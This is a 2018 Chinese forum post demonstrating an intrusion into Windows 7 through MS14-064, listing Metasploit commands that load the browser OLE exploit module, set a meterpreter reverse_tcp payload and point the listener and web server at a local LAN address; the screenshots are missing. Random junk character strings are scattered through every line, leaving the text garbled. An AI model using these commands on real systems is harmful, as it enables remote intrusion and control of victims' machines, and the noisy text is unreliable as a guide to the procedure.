找回密码
 立即注册
查看: 2284|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 _" Z9 b* x+ w; T4 f* v* V8 Z% i 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示5 H0 D" G* }) c* }

/ L1 s* W' c" u: @; q8 Z

' m: s( @0 `& q L' v, [' H 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 7 L, m0 a, E7 d5 x

! X: l4 M, k' O% E m$ | `

9 ~ I+ p) Z$ X 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp ; V" L' _; ^: D8 E B1 J: I3 F

3 x6 }, r9 n! |( ? \5 U! N! G, o

6 L x# K8 s$ \* c$ v9 M# e4 H. f1 ]             set AllowPowershellPrompt true1 n' _4 L0 r' U2 e9 ]5 Q; o% h

$ `0 E) P8 E7 M) t8 s) X. l1 f* B5 N

5 [( c: i1 R8 d             Set LHOST 192.168.0.109$ b4 o7 C- A b/ z1 t1 y+ a% n6 g" s

' U5 K8 a; b" e: [3 J" ? x

+ q3 S$ ?! y5 S; F9 s             set SRVHOST 192.168.0.109 - Z$ R5 [ \, q) c' i/ |# N

2 ]! d% h0 t* k8 n B/ z1 N

' }% @0 e$ ]; j1 K- @             Set uripath share ; X0 f0 V# U ~/ C: d) e

2 k2 W1 k# T# J% z) _% ?2 z- Q& t

6 B2 w& e& E! _$ B/ v( L             Set srvport 80 2 E0 x1 ?! C4 d! P- `

6 t8 L, }5 H: R1 @; q

( P; `1 T1 [$ ~" x/ D2 n   ( D1 s2 _% Y0 m6 {; c5 G; W: }( _

8 j; ?8 H4 n. d, @/ h/ ~2 P8 P

0 B% q$ q0 O2 Q   : K5 Z( U U$ R' G

1 k- p; f& A2 U) Z

4 I" a0 {: y( l   3 u9 j ^& B. T$ v! d6 L2 J

4 I) T! U2 Q" {' p* K

) f5 w0 }* ]/ @   9 F- V% @. I, j, ]. c2 O% Q

" I8 @' @( F# z* U

1 _9 a) n. r+ s+ s   : t: b) Q# k ~5 m, i

7 c$ O' ?' K% U0 Z+ s5 K4 W

k: G* S6 z6 }3 H: s8 s 下面我们来访问本地地址如图: # p* v* _* c' S/ ?- L1 q

, B* f \6 @, x3 {/ V

8 l" q& F0 k Y5 [( O: `  ' A' e/ {3 x2 ^3 r' K8 F, O

& H8 D( H& o' a4 C0 I$ f

! w3 m s6 F. i! t  # e5 V6 t; x& S' |

7 v1 d7 A, @2 u- h- q

6 H2 D0 j% f" a# O+ y: u : X$ Q7 h$ J' `5 M6 j: O

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表